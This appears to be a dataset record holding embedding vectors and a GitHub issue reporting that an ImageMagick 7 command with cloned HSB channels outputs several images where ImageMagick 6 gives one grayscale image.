0.024233749136328697, -0.03161882236599922, -0.006456034258008003, 0.011510636657476425, 0.0005009331507608294, -0.011817692779004574, 0.008589674718677998, 0.015770044177770615, -0.014305627904832363, 0.016927408054471016, 0.00801886711269617, 0.011109103448688984, 0.0026119383983314037, 0.01654949225485325, 0.01949407532811165, -0.016108592972159386, -0.01678568869829178, -0.016801435500383377, -0.014376486651599407, -0.013061660341918468, 0.003015440423041582, -0.00551912235096097, 0.0018738246290013194, 0.015179554000496864, -0.0005899989046156406, 0.010991005226969719, 0.009487221017479897, 0.02456442452967167, 0.0020312888082116842, 0.023414934054017067, -0.005782874766737223, -0.006066310219466686, -0.00708195473998785, 0.029792236164212227, -0.001100281486287713, -0.009502967819571495, -0.0035035796463489532, 0.01027454249560833, -0.0015392131172120571, 0.008408591151237488, -0.0023481857497245073, -0.011652355082333088, -0.007479552179574966, -0.008432210423052311, -0.01760450378060341, 0.005582107696682215, -0.006995349656790495, 0.007711811922490597, -0.002135609043762088, -0.003129602177068591, -0.00734570762142539, 0.028406551107764244, 0.007093764841556549, -0.006585942581295967, -0.00939274299889803, -0.0075149815529584885, -0.013612784445285797, -0.016596732661128044, 0.020832519978284836, 0.014541824348270893, -0.02149387076497078, 0.0009669289574958384, -0.018816977739334106, 0.004125563427805901, 0.0021257675252854824, 0.004916821140795946, 0.005712016019970179, 0.005361658055335283, -0.012644379399716854, -0.021068716421723366, 0.00261390651576221, 0.013384461402893066, -0.019761763513088226, -0.003251636866480112, 0.006593815516680479, -0.032406143844127655, -0.008306239731609821, 0.004649132024496794, -0.002200562972575426, -0.011124849319458008, -0.008605421520769596, 0.0005265211220830679, 0.02053333818912506, 0.027776693925261497, 0.014470964670181274, 0.028863197192549706, 0.001117012114264071, -0.017100617289543152, -0.0018374109640717506, -0.015329144895076752, -0.017384054139256477, 0.005322291981428862, 0.01676994375884533, -0.02396605908870697, -0.000016100104403449222, -0.00033657983294688165, 0.005093968473374844, 0.02054908499121666, 0.017321068793535233, 0.00844008382409811, -0.003104014089331031, -0.01045562606304884, -0.015006343834102154, -0.014903991483151913, -0.00038775571738369763, 0.005416770465672016, -0.005534868687391281, 0.005629347171634436, 0.001270539709366858, 0.01605348102748394, -0.002442664233967662, 0.007719684857875109, -0.008180268108844757, -0.013683644123375416, 0.004294837359338999, -0.01736830733716488, -0.003710251534357667, -0.00758190406486392, -0.012683745473623276, -0.018250107765197754, -0.024359719827771187, -0.004145246464759111, -0.009518714621663094, 0.014124543406069279, -0.0028855325654149055, 0.006940237246453762, -0.011353172361850739, -0.01569131389260292, 0.003017408773303032, 0.006522956769913435, 0.012786097824573517, -0.01205388829112053, 0.023666877299547195, -0.009810023009777069, -0.019100414589047432, -0.020832519978284836, -0.023777103051543236, 0.015659820288419724, -0.007605523336678743, -0.009707671590149403, 0.0005442358087748289, 0.009219531901180744, -0.01535276509821415, 0.014518204145133495, -0.015313399024307728, 0.0029937890358269215, -0.0036216778680682182, -0.00896758958697319, -0.0029760743491351604, 0.011770453304052353, -0.010613090358674526, -0.01299080066382885, 0.008274746127426624, 0.02087976038455963, 0.03886217623949051, -0.02078528143465519, -0.026942133903503418, 0.004523160867393017, 0.0028835642151534557, 0.008707772940397263, -0.01689591445028782, -0.0072433557361364365, -0.004499541129916906, -0.0006834932719357312, -0.005117588210850954, -0.003857874311506748, -0.010030472651124, 0.0026847654953598976, -0.0035764069762080908, 0.012919941917061806, 0.005208129994571209, 0.008337732404470444, -0.011479143984615803, 0.01689591445028782, 0.01958855241537094, -0.008810125291347504, 0.008337732404470444, -0.01758875697851181, -0.016140086576342583, 0.0065347664058208466, -0.013360842131078243, 0.011109103448688984, -0.0206750575453043, -0.016218818724155426, 0.004924694541841745, -0.0036807269789278507, 0.011904297396540642, 0.007400820031762123, -0.04084622859954834, -0.0009423251613043249, -0.004849899094551802, 0.010290289297699928, -0.015022089704871178, 0.0070898281410336494, -0.00029229302890598774, -0.0012557774316519499, -0.014848879538476467, 0.027760948985815048, -0.025824137032032013, 0.036657679826021194, -0.006129296030849218, -0.005231749732047319, 0.012313704937696457, -0.008180268108844757, -0.004940440878272057, -0.0010264700977131724, 0.02456442452967167, -0.016218818724155426, -0.0019387786742299795, 0.01010133232921362, -0.0052593061700463295, 0.010935892350971699, 0.008825871162116528, 0.006562322843819857, 0.012046015821397305, 0.01392771303653717, 0.00807791668921709, 0.014045811258256435, 0.01553384866565466, -0.019572807475924492, 0.012353071011602879, 0.012880575843155384, -0.01168384775519371, -0.015651946887373924, 0.002897342201322317, 0.005184510722756386, -0.007455932442098856, -0.017289575189352036, -0.01280184369534254, -0.0011790136341005564, 0.014085177332162857, -0.036185286939144135, 0.022974034771323204, -0.0023107880260795355, 0.005652966909110546, -0.0013768280623480678, 0.0029052156023681164, -0.015770044177770615, 0.0034622452221810818, -0.004086197353899479, -0.008652660995721817, -0.01675419695675373, 0.016596732661128044, -0.0021119893062859774, -0.027556244283914566, -0.00025218885275535285, 0.009195912629365921, 0.0018915393156930804, -0.04544418305158615, 0.013305729255080223, 0.036626186221838, -0.01889570988714695, -0.021084463223814964, -0.014612683095037937, 0.02136790007352829, -0.0017822985537350178, 0.0070071592926979065, -0.0006308411830104887, 0.01032965537160635, 0.003743712557479739, 0.022013502195477486, 0.0018315061461180449, 0.022722091525793076, -0.004731800872832537, -0.003355956869199872, 0.008613294921815395, -0.02905215509235859, -0.006515083368867636, -0.010683950036764145, -0.0009688972495496273, -0.00732208788394928, 0.0132742365822196, 0.009558080695569515, 0.015628326684236526, 0.021745814010500908, 0.017903685569763184, -0.012368816882371902, -0.01144765131175518, -0.01702188514173031, -0.009975360706448555, 0.0051412079483270645, -0.009873008355498314, -0.005861606914550066, 0.003810635069385171, -0.030500825494527817, 0.025950109586119652, 0.003104014089331031, 0.012951434589922428, -0.0016563271638005972, 0.006967793218791485, -0.015793664380908012, 0.002828451571986079, 0.009361250326037407, 0.01168384775519371, 0.04270430654287338, -0.014888245612382889, -0.014423726126551628, 0.0004256455576978624, -0.015431497246026993, 0.008605421520769596, 0.0014457186916843057, -0.012085381895303726, -0.013911967165768147, 0.0017045505810528994, -0.017069125548005104, 0.009715544059872627, -0.010668203234672546, -0.013628531247377396, 0.008298366330564022, 0.015258286148309708, 0.0009137847810052335, -0.02209223434329033, -0.0032477001659572124, 0.0230055283755064, 0.01375450287014246, 0.014321373775601387, -0.013778122141957283, 0.00001859123949543573, 0.013471066951751709, 0.01192791759967804, -0.016100719571113586, -0.03034336119890213, 0.008983335457742214, -0.00010702648432925344, 0.006684357766062021, 0.004279091022908688, -0.014770147390663624, -0.021635588258504868, -0.0031197606585919857, 0.013597038574516773, -0.0015795632498338819, 0.0011642513563856483, 0.0005294735310599208, 0.014833132736384869, 0.0032477001659572124, 0.009227405302226543, 0.007562221027910709, 0.0017872193129733205, -0.014108797535300255, 0.021698573604226112, -0.00043917764560319483, 0.002373773604631424, 0.007444122806191444, 0.011172088794410229, -0.007900768890976906, 0.009030574932694435, -0.0007568125729449093, 0.04912884905934334, 0.00572382565587759, 0.01281759049743414, 0.013321476057171822, -0.0005649030208587646, -0.024013299494981766, -0.00154216552618891, 0.00365907559171319, -0.0012439675629138947, 0.00027359413797967136, -0.01642352156341076, 0.0159432552754879, -0.0020411303266882896, -0.004534970503300428, -0.016628224402666092, -0.00939274299889803, 0.010912273079156876, 0.009266771376132965, 0.007810227107256651, -0.017147857695817947, 0.0030744895339012146, 0.00038603346911258996, 0.018722500652074814, -0.006507210433483124, 0.02102147787809372, 0.003170936368405819, -0.0036531707737594843, -0.007416566368192434, -0.014085177332162857, 0.012038142420351505, -0.02928835153579712, 0.010006853379309177, -0.02327321656048298, -0.008384971879422665, 0.007034715730696917, 0.0040192753076553345, -0.0005373467574827373, 0.02173006720840931, 0.006333999801427126, 0.010841414332389832, -0.004223978612571955, 0.01050286553800106, 0.01458906289190054, -0.0004431142588146031, -0.013069532811641693, -0.007904705591499805, -0.0007371295359916985, 0.014478838071227074, 0.0241865087300539, 0.0037515859585255384, 0.0014959104591980577, -0.007936198264360428, -0.01010133232921362, -0.022281192243099213, -0.0025332062505185604, 0.004684561397880316, 0.018942950293421745, 0.0046806251630187035, -0.018391825258731842, 0.00862904079258442, 0.007948008365929127, -0.03243763744831085, 0.0042436616495251656, -0.014770147390663624, -0.0030193771235644817, 0.003239826997742057, -0.03388630598783493, -0.0068890610709786415, -0.0019397627329453826, 0.017321068793535233, 0.010187936946749687, 0.009983234107494354, -0.011384665966033936, -0.01528977882117033, 0.005397087428718805, -0.0067709628492593765, 0.0018098547589033842, 0.012675872072577477, -0.001171140349470079, 0.02182454615831375, 0.010117078199982643, -0.003222112311050296, -0.017919432371854782, 0.0064639076590538025, -0.015195300802588463, 0.012691618874669075, 0.00389527203515172, -0.018628021702170372, 0.0012843178119510412, 0.0016386123606935143, -0.020706549286842346, 0.008526689372956753, 0.0014978786930441856, 0.00807791668921709, 0.017777714878320694, 0.00570020591840148, -0.014037937857210636, -0.010707569308578968, -0.00460189301520586, 0.010731188580393791, 0.015305525623261929, -0.015770044177770615, 0.009581699967384338, 0.0031748730689287186, -0.00216907006688416, -0.0027201951015740633, -0.0032280171290040016, 0.022958287969231606, -0.0013640341348946095, -0.02669019065797329, -0.006542639806866646, 0.01008558552712202, -0.018013911321759224, 0.008802251890301704, -0.01713211089372635, 0.005404960364103317, -0.0072433557361364365, -0.014533950947225094, 0.015029963105916977, 0.012849083170294762, 0.005247496068477631, -0.025698166340589523, -0.009345503523945808, 0.016108592972159386, 0.023115752264857292, 0.025887124240398407, -0.01140041183680296, 0.004397189244627953, 0.009810023009777069, 0.0055309319868683815, 0.005597854033112526, 0.013502559624612331, -0.030737021937966347, -0.0007371295359916985, -0.008581802248954773, -0.026501234620809555, 0.010227303020656109, -0.030485080555081367, 0.013148264959454536, 0.006558386143296957, 0.01688016764819622, -0.009219531901180744, -0.007755114696919918, 0.026406755670905113, -0.01032178197056055, -0.007755114696919918, -0.017289575189352036, 0.021651335060596466, -0.018628021702170372, 0.002356058917939663, -0.007459869142621756, -0.027241315692663193, -0.0018561099423095584, -0.018565036356449127, -0.025698166340589523, -0.0066095623187720776, 0.023430680856108665, 0.013951333239674568, -0.0057513820938766, -0.008377098478376865, 0.02905215509235859, 0.025477716699242592, 0.004058641381561756, 0.005164827685803175, -0.0021119893062859774, -0.010345401242375374, -0.002678860677406192, 0.004657005425542593, -0.020249903202056885, 0.007896832190454006, -0.0073142144829034805, 0.00796769093722105, 0.01615583337843418, 0.005755318328738213, -0.012935688719153404, 0.006322189699858427, 0.0036393925547599792, -0.008558182045817375, 0.012849083170294762, 0.009873008355498314, 0.006255267653614283, 0.02102147787809372, -0.0005712999845854938, -0.01843906380236149, 0.0002524348965380341, -0.0025489525869488716, 0.020706549286842346, 0.015281906351447105, 0.015872396528720856, 0.018958697095513344, 0.007381136994808912, 0.01050286553800106, 0.027918413281440735, 0.013069532811641693, 0.004932567942887545, 0.019746016710996628, 0.02787117287516594, 0.007601587101817131, -0.012203480117022991, 0.01351830642670393, 0.003877557348459959, 0.005692332983016968, -0.005735635291785002, 0.008235380984842777, -0.009723417460918427, 0.006719787139445543, -0.011187835596501827, -0.0009428172488696873, -0.005393150728195906, 0.014715034514665604, 0.019399596378207207, -0.02102147787809372, -0.013258489780128002, -0.020864013582468033, 0.010786301456391811, 0.03256360813975334, -0.009660432115197182, -0.00046968634705990553, -0.02810736931860447, 0.01702188514173031, -0.006318252999335527, -0.023414934054017067, 0.005948211997747421, 0.015274032950401306, -0.0026119383983314037, -0.011179962195456028, -0.010117078199982643, -0.013471066951751709, 0.018391825258731842, -0.011337426491081715, -0.004971934016793966, 0.01572280563414097, 0.007030779030174017, -0.009597446769475937, -0.018864218145608902, 0.006763089913874865, -0.0037181247025728226, -0.0019909385591745377, 0.0007267959299497306, 0.005778938066214323, 0.01995072141289711, -0.025178534910082817, -0.017384054139256477, -0.027713708579540253, -0.007987374439835548, -0.006314316764473915, 0.01492761168628931, -0.000005036088168708375, 0.0012557774316519499, 0.009542333893477917, -0.012030269019305706, -0.008479449898004532, -0.002997725736349821, -0.006530830170959234, 0.005093968473374844, -0.04317669942975044, -0.0010599312372505665, 0.02665869891643524, 0.008888857439160347, 0.002047035377472639, 0.003474055090919137, 0.0005762207438237965, -0.01008558552712202, 0.01736830733716488, -0.008558182045817375, 0.017746221274137497, 0.005137271247804165, 0.003879525465890765, 0.010605217888951302, -0.014982723630964756, -0.006538703106343746, -0.0109280189499259, -0.007282721810042858, 0.018958697095513344, -0.0011573622468858957, 0.021903278306126595, -0.013368715532124043, -0.016565239056944847, -0.01009345892816782, -0.005097905173897743, -0.033130478113889694, 0.005849797278642654, 0.0035173578653484583, 0.007381136994808912, 0.03612229973077774, -0.008306239731609821, 0.008747139014303684, -0.006452098023146391, -0.016100719571113586, 0.020596325397491455, -0.004160992801189423, -0.0008685137727297843, 0.001971255522221327, -0.02465890161693096, 0.00755828432738781, 0.023824341595172882, 0.01257352065294981, 0.02256462723016739, -0.0033284006640315056, 0.007589777000248432, -0.0077393678948283195, -0.025320252403616905, -0.009699798189103603, -0.013321476057171822, 0.006916617508977652, -0.0018541415920481086, 0.021919025108218193, -0.024359719827771187, -0.018108388409018517, 0.005908846389502287, 0.00038750970270484686, -0.009707671590149403, -0.0022596120834350586, 0.016203071922063828, -0.0028697859961539507, 0.019509820267558098, 0.015447243116796017, -0.005967895034700632, 0.015966875478625298, -0.009298264048993587, -0.011235074140131474, -0.0004903535591438413, 0.0024820303078740835, 0.028075875714421272, -0.0023462173994630575, 0.003050870029255748, -0.012699492275714874, 0.019635792821645737, -0.003609867999330163, -0.008699900470674038, -0.017761968076229095, 0.009833642281591892, -0.025650927796959877, 0.01399069931358099, 0.007711811922490597, -0.007286658510565758, 0.0017055347561836243, 0.028044383972883224, -0.0052593061700463295, -0.009361250326037407, 0.0031807778868824244, 0.014659922569990158, 0.0042161052115261555, 0.004818406421691179, -0.003525231033563614, 0.0032142391428351402, -0.0011662195902317762, -0.010526485741138458, -0.006089929956942797, 0.05634070932865143, -0.008959716185927391, 0.0017665521008893847, 0.00596002209931612, 0.007601587101817131, 0.013919840566813946, 0.005656903143972158, -0.01032965537160635, -0.0053419750183820724, -0.006046627182513475, 0.009266771376132965, -0.0009875961113721132, -0.002674923976883292, -0.008050359785556793, -0.019179146736860275, 0.00455071683973074, 0.005798621103167534, 0.007944071665406227, -0.01818712055683136, -0.013974952511489391, 0.00862904079258442, 0.005452199839055538, 0.024485692381858826, -0.006255267653614283, 0.0018187121022492647, 0.010935892350971699, -0.006491464097052813, -0.005601790733635426, 0.012447549030184746, -0.005345911253243685, 0.05297097563743591, -0.01996646821498871, -0.014266261830925941, 0.006267077289521694, 0.01878548599779606, 0.004684561397880316, -0.0046806251630187035, 0.02276933193206787, -0.0011091388296335936, -0.013156138360500336, 0.0043263304978609085, -0.0018590623512864113, 0.015966875478625298, 0.02727280929684639, 0.007546474225819111, 0.02147812396287918, -0.009046321734786034, 0.007802353706210852, 0.011597242206335068, 0.00939274299889803, 0.006255267653614283, -0.004109817091375589, 0.004830216057598591, -0.007416566368192434, 0.009589573368430138, 0.03602782264351845, 0.02091125212609768, 0.0011898393277078867, 0.011612989008426666, 0.005763191729784012, 0.005507312249392271, -0.012660126201808453, -0.012132620438933372, 0.007743304595351219, -0.028012890368700027, 0.006290697026997805, -0.007030779030174017, 0.022501641884446144, -0.01804540306329727, 0.04238937795162201, -0.0008955779485404491, -0.023336201906204224, -0.018927203491330147, -0.00355475558899343, 0.0012449517380446196, -0.03105195052921772, -0.001591373118571937, -0.007928324863314629, -0.005145144648849964, 0.007144940551370382, 0.01924213208258152, 0.0020745915826410055, 0.008951842784881592, -0.00784172024577856, -0.0289104375988245, -0.013132519088685513, -0.02395031228661537, -0.0038736206479370594, 0.004121626727283001, 0.02042311429977417, 0.022832317277789116, 0.020013706758618355, -0.01056585181504488, -0.008235380984842777, -0.006137169431895018, -0.003265415085479617, -0.007751177996397018, 0.010306035168468952, 0.010699695907533169, 0.013888346962630749, 0.006511147134006023, 0.01552597526460886, 0.006456034258008003, 0.015100821852684021, -0.0018383951392024755, 0.02113170363008976, 0.001103233895264566, -0.008534562774002552, -0.016943152993917465, 0.020123932510614395, 0.008778632618486881, 0.0005309497937560081, 0.01232945080846548, 0.004676688462495804, 0.015179554000496864, 0.0069717299193143845, 0.007121320813894272, -0.003968099132180214, 0.01795092411339283, 0.001573658431880176, -0.017761968076229095, 0.012479042634367943, 0.028973422944545746, 0.010620963759720325, -0.00030877755489200354, -0.0006308411830104887, 0.021682828664779663, 0.034547656774520874, 0.01552597526460886, 0.022942541167140007, -0.0017193128587678075, -0.007940134964883327, 0.006396985147148371, -0.017982417717576027, -0.0012971118558198214, 0.021210435777902603, -0.0017744252691045403, 0.040184877812862396, 0.028154607862234116, 0.00040202593663707376, 0.00844795722514391, 0.046798378229141235, -0.010542231611907482, 0.0052947355434298515, -0.0141639094799757, 0.012502661906182766, 0.002214341191574931, -0.01103824470192194, -0.021808799356222153, -0.028737226501107216, 0.034421686083078384, 0.025792645290493965, 0.0026985437143594027, 0.0017389958957210183, -0.016313297674059868, 0.01724233664572239, 0.0026158748660236597, 0.0032240806613117456, 0.000167674821568653, 0.008274746127426624, -0.01488037221133709, 0.01735256053507328, -0.012762477621436119, 0.02278507687151432, -0.0037378077395260334, -0.01618732511997223, 0.02173006720840931, -0.007511044852435589, 0.0018876027315855026, -0.020060945302248, -0.005952148698270321, -0.025084055960178375, -0.016738450154662132, -0.0075504109263420105, 0.017635997384786606, 0.0050585390999913216, 0.008904603309929371, -0.019793257117271423, 0.014715034514665604, -0.002324566012248397, -0.008888857439160347, 0.010786301456391811, -0.0007641937118023634, 0.012825463898479939, 0.023414934054017067, 0.00033731796429492533, -0.013612784445285797, -0.01535276509821415, -0.004263344686478376, -0.007503171917051077, -0.0028166419360786676, -0.010943765752017498, -0.0029878842178732157, 0.012770351022481918, -0.007381136994808912, -0.0037338710390031338, 0.007172496989369392, -0.006341872736811638, 0.017273828387260437, -0.003627582686021924, 0.00217103841714561, -0.030658289790153503, -0.006790645886212587, 0.005137271247804165 ]
null
null
null
null
null
null
null
null
null
[ "ImageMagick", "ImageMagick" ]
### ImageMagick version 7.1.1-12 ### Operating system MacOS ### Operating system, version and so on Ventura ### Description The following code works fine in IM 6 to give a single grayscale channel output. ![image original](https://github.com/ImageMagick/ImageMagick/assets/13458218/f76d03cb-907b-43cb-a2f8-9080dfa028fa) ``` convert image.original.jpg \ \( -clone 0 -colorspace HSB -channel G -negate -separate +channel \) \ \( -clone 0 -colorspace HSB -channel B -separate +channel -solarize 50% -level 0x50% \) \ \( -clone 1 -clone 2 -compose multiply -composite \) \ \( -clone 3 -contrast-stretch 0,1% -fill black +opaque white \) \ -delete 0-3 -format "%[channels]\n" info: gray ``` However, I get a weird combination of images output as if getting every different image from each parenthesis in the output from the same command in IM 7. This is possibly an issue with MPC. ``` magick image.original.jpg \ \( -clone 0 -colorspace HSB -channel G -negate -separate +channel \) \ \( -clone 0 -colorspace HSB -channel B -separate +channel -solarize 50% -level 0x50% \) \ \( -clone 1 -clone 2 -compose multiply -composite \) \ \( -clone 3 -contrast-stretch 0,1% -fill black +opaque white \) \ -delete 0-3 -format "%[channels]\n" info: srgb 3.0 srgb 3.0 srgb 3.0 gray 1.0 gray 1.0 ``` ### Steps to Reproduce See above ### Images See above
Error in number of channels output from command in IM 7 but not in IM 6
https://api.github.com/repos/ImageMagick/ImageMagick/issues/6461/comments
3
2023-07-04T22:20:20
2023-07-13T23:57:19Z
https://github.com/ImageMagick/ImageMagick/issues/6461
1,788,525,539
6,461
false
This is a GitHub Issue repo:ImageMagick owner:ImageMagick Title : Error in number of channels output from command in IM 7 but not in IM 6 Issue date: --- start body --- ### ImageMagick version 7.1.1-12 ### Operating system MacOS ### Operating system, version and so on Ventura ### Description The following code works fine in IM 6 to give a single grayscale channel output. ![image original](https://github.com/ImageMagick/ImageMagick/assets/13458218/f76d03cb-907b-43cb-a2f8-9080dfa028fa) ``` convert image.original.jpg \ \( -clone 0 -colorspace HSB -channel G -negate -separate +channel \) \ \( -clone 0 -colorspace HSB -channel B -separate +channel -solarize 50% -level 0x50% \) \ \( -clone 1 -clone 2 -compose multiply -composite \) \ \( -clone 3 -contrast-stretch 0,1% -fill black +opaque white \) \ -delete 0-3 -format "%[channels]\n" info: gray ``` However, I get a weird combination of images output as if getting every different image from each parenthesis in the output from the same command in IM 7. This is possibly an issue with MPC. ``` magick image.original.jpg \ \( -clone 0 -colorspace HSB -channel G -negate -separate +channel \) \ \( -clone 0 -colorspace HSB -channel B -separate +channel -solarize 50% -level 0x50% \) \ \( -clone 1 -clone 2 -compose multiply -composite \) \ \( -clone 3 -contrast-stretch 0,1% -fill black +opaque white \) \ -delete 0-3 -format "%[channels]\n" info: srgb 3.0 srgb 3.0 srgb 3.0 gray 1.0 gray 1.0 ``` ### Steps to Reproduce See above ### Images See above --- end body ---
1,599
[ 0.022267796099185944, -0.006332583259791136, -0.013230448588728905, 0.019119393080472946, -0.011312784627079964, 0.017516570165753365, 0.014110569842159748, 0.05458185821771622, -0.02328387089073658, 0.037752214819192886, 0.010518528521060944, -0.011534604243934155, 0.0022700701374560595, 0.019405610859394073, -0.003194913500919938, 0.033831022679805756, -0.02834993787109852, 0.03331582993268967, -0.014210746623575687, 0.004067879635840654, 0.012400414794683456, -0.011770733632147312, -0.01914801448583603, 0.04476456716656685, -0.03829602897167206, -0.006386249326169491, -0.00508037768304348, -0.0102179991081357, -0.018818862736225128, -0.01016791071742773, 0.051376212388277054, 0.028192518278956413, -0.007334347814321518, 0.035319358110427856, 0.026904534548521042, -0.010346797294914722, 0.017387771978974342, 0.055640868842601776, 0.005581259727478027, 0.0303677786141634, -0.010361107997596264, -0.03440345823764801, 0.029480502009391785, -0.005634925793856382, -0.011284162290394306, -0.013080183416604996, -0.019534409046173096, -0.03463243320584297, -0.024714963510632515, 0.00026676454581320286, 0.007262793369591236, -0.035176247358322144, -0.0021215942688286304, 0.008429133333265781, -0.002668987028300762, -0.023655954748392105, 0.03958401456475258, 0.030653996393084526, -0.015326998196542263, 0.02235366217792034, 0.005538327153772116, 0.04198824614286423, -0.03219957649707794, 0.026947468519210815, -0.021523628383874893, -0.004819203168153763, -0.013616843149065971, 0.009273477829992771, 0.006575868930667639, -0.010883457027375698, 0.009681339375674725, 0.01152744796127081, 0.023040585219860077, 0.04945854842662811, 0.03208509087562561, 0.009752893820405006, 0.07527545094490051, 0.017702611163258553, -0.059418950229883194, 0.025587929412722588, -0.06479986011981964, 0.013352091424167156, -0.061250749975442886, 0.06874967366456985, 0.03717977926135063, 0.01265085581690073, -0.033430315554142, -0.06199491769075394, -0.026747114956378937, 0.025759661570191383, -0.016715157777071, 0.014954914338886738, 0.02657538466155529, -0.014647229574620724, -0.004643894266337156, -0.01322329230606556, 0.006844198796898127, -0.003155558602884412, -0.04015645012259483, -0.03182749077677727, 0.013108805753290653, -0.021208787336945534, 0.01959165371954441, 0.01755950227379799, 0.021466383710503578, -0.02275436744093895, -0.0022593368776142597, -0.028020787984132767, 0.006965841632336378, 0.11242660880088806, 0.012121351435780525, 0.007735054008662701, -0.04456421360373497, -0.03480416536331177, 0.027061956003308296, 0.022067442536354065, -0.008178692311048508, -0.014260835014283657, 0.02169535867869854, 0.0030696929898113012, -0.027906300500035286, -0.014883359894156456, -0.037952568382024765, -0.005098266061395407, -0.04880024865269661, 0.006572291254997253, -0.0010223365388810635, 0.008930016309022903, -0.00627176184207201, 0.008071360178291798, -0.02126603201031685, -0.03388826549053192, 0.019305434077978134, -0.017645368352532387, -0.037065289914608, -0.027047643437981606, -0.03683631494641304, 0.04204549267888069, -0.02942325733602047, -0.010375418700277805, -0.0400419607758522, -0.04610979184508324, 0.05406666547060013, 0.028035098686814308, -0.007205549627542496, -0.0005487344460561872, 0.004225300159305334, 0.0017745544901117682, 0.0004259735578671098, -0.008650952950119972, -0.012250149622559547, 0.020707905292510986, -0.007964028976857662, 0.008930016309022903, 0.03660733997821808, -0.004615272860974073, 0.04287552461028099, 0.008765440434217453, -0.026961779221892357, -0.0417020283639431, -0.0272193755954504, -0.025330333039164543, -0.007763675879687071, -0.00841482263058424, 0.020235644653439522, -0.014854737557470798, 0.012235838919878006, 0.034260351210832596, 0.01090492308139801, 0.02213899791240692, -0.028221139684319496, 0.023011963814496994, 0.0037673504557460546, -0.02213899791240692, -0.015012158080935478, 0.012336015701293945, 0.004221722483634949, 0.013266225345432758, 0.01529837679117918, -0.030825728550553322, -0.02085101418197155, -0.018690064549446106, -0.012665166519582272, 0.0023273138795048, 0.042503442615270615, -0.027691636234521866, 0.0009588318062014878, -0.017645368352532387, -0.012135663069784641, -0.010876301676034927, 0.010525683872401714, -0.0024525343906134367, 0.02880788780748844, -0.04393453150987625, 0.017301905900239944, 0.04204549267888069, -0.028006475418806076, -0.027247997000813484, -0.013752796687185764, -0.0016010345425456762, 0.0387253575026989, -0.048428162932395935, -0.018461091443896294, -0.020364442840218544, -0.009116058237850666, 0.0006565136136487126, -0.06657441705465317, 0.02298334240913391, 0.021552249789237976, -0.026947468519210815, -0.026231922209262848, -0.019849250093102455, 0.022067442536354065, -0.019405610859394073, -0.0046260058879852295, -0.004393453244119883, 0.006711822934448719, 0.052664197981357574, -0.023884929716587067, -0.009838759899139404, 0.021337585523724556, -0.017616746947169304, 0.013852973468601704, -0.029280148446559906, -0.025430509820580482, -0.01201402023434639, -0.02720506489276886, 0.008128603920340538, -0.027562838047742844, -0.0111696757376194, -0.01883317530155182, 0.011484515853226185, -0.0010017645545303822, 0.011212607845664024, -0.03122643381357193, 0.005788768175989389, -0.01529837679117918, 0.0028854398988187313, 0.0009633040172047913, 0.026017257943749428, 0.001768293441273272, 0.029680853709578514, -0.00717335008084774, 0.007391591556370258, 0.037952568382024765, 0.010225154459476471, 0.0072305938228964806, -0.03237130865454674, -0.021738292649388313, 0.017115863040089607, 0.03394550830125809, -0.005677858833223581, -0.01884748600423336, 0.010611549019813538, -0.0239135529845953, 0.004103657323867083, 0.017802787944674492, 0.0069229090586304665, 0.0038138609379529953, -0.0410437285900116, -0.007051707245409489, 0.05048893764615059, -0.030453644692897797, 0.00026206878828816116, 0.03282925859093666, -0.028020787984132767, -0.018575577065348625, 0.008808373473584652, -0.012250149622559547, 0.02644658461213112, 0.027448350563645363, -0.033716533333063126, -0.027047643437981606, -0.012915607541799545, -0.017917275428771973, -0.02062203921377659, 0.0035097538493573666, -0.0020053181797266006, -0.008057049475610256, -0.007985495030879974, 0.02326956018805504, 0.08517861366271973, -0.014611451886594296, -0.01281543169170618, 0.012314548715949059, 0.0423603318631649, 0.011205452494323254, -0.004007058218121529, -0.05449599400162697, -0.013874439522624016, 0.016371695324778557, 0.014668695628643036, -0.00415732292458415, -0.00759910000488162, -0.016801023855805397, -0.02965223230421543, 0.004783425945788622, 0.008851305581629276, 0.011277006939053535, 0.017974520102143288, -0.0014793917071074247, -0.024629097431898117, 0.008006961084902287, -0.0053200856782495975, -0.03322996199131012, 0.06136523559689522, -0.006575868930667639, 0.028120962902903557, -0.01001049019396305, 0.0189476627856493, 0.009194768033921719, 0.0029856162145733833, -0.013166049495339394, -0.021681047976017, -0.03337307274341583, -0.030339157208800316, 0.048514027148485184, 0.014911981299519539, -0.006990885827690363, -0.011770733632147312, 0.011033721268177032, -0.030310533940792084, -0.01005342323333025, 0.02563086338341236, 0.003899726551026106, 0.03800981119275093, -0.032657526433467865, 0.03451794758439064, -0.04802745580673218, -0.014854737557470798, 0.03454656898975372, -0.03374515473842621, 0.03597766160964966, 0.01568477228283882, 0.02276867814362049, -0.04754088446497917, -0.02032151073217392, 0.014482653699815273, 0.018446778878569603, -0.021867090836167336, 0.0019910072442144156, 0.010289553552865982, -0.003695795778185129, -0.04562322050333023, 0.021452073007822037, -0.02561655268073082, 0.020994123071432114, -0.0001235435192938894, 0.015284066088497639, 0.02212468720972538, 0.000850605487357825, 0.02593139186501503, -0.0324285514652729, 0.01715879701077938, -0.016171343624591827, -0.0024883116129785776, -0.03769497200846672, -0.027448350563645363, 0.024915317073464394, -0.025888459756970406, -0.019505787640810013, -0.06588748842477798, 0.015928057953715324, -0.004504363052546978, -0.0006475692498497665, 0.017387771978974342, 0.0014266201760619879, -0.03071124106645584, -0.0037888167425990105, -0.02086532488465309, -0.027376795187592506, 0.03978436440229416, -0.054553236812353134, 0.015055091120302677, -0.04702569171786308, -0.005717213731259108, 0.0291227288544178, -0.004847825039178133, -0.006600913126021624, 0.004246766213327646, -0.02993845008313656, 0.0340886190533638, 0.026303475722670555, -0.04476456716656685, 0.027591459453105927, 0.0170443095266819, -0.0326002836227417, 0.00925916712731123, 0.029995694756507874, -0.06159421056509018, -0.06142248213291168, -0.024113904684782028, -0.012242994271218777, -0.028464425355196, -0.012192905880510807, 0.04676809534430504, -0.0007486401591449976, -0.028020787984132767, 0.010718881152570248, 0.00500166742131114, -0.005323663353919983, -0.03918330743908882, 0.027276618406176567, 0.021852780133485794, -0.029137039557099342, 0.030882971361279488, -0.028879443183541298, -0.0005125098978169262, 0.031283676624298096, 0.02603156864643097, 0.000289572577457875, 0.0032378463074564934, -0.03197060152888298, 0.010289553552865982, -0.0010786858620122075, 0.0072127049788832664, 0.01111958734691143, 0.013802885077893734, -0.012615078128874302, -0.005284308455884457, 0.022525392472743988, -0.010296708904206753, -0.0038675270043313503, 0.006171585526317358, -0.00635047210380435, -0.017645368352532387, 0.017330527305603027, -0.0188617967069149, 0.04130132496356964, 0.0022253484930843115, -0.021881401538848877, -0.030281912535429, -0.0012897718697786331, 0.012858363799750805, 0.013817195780575275, -0.0060857199132442474, 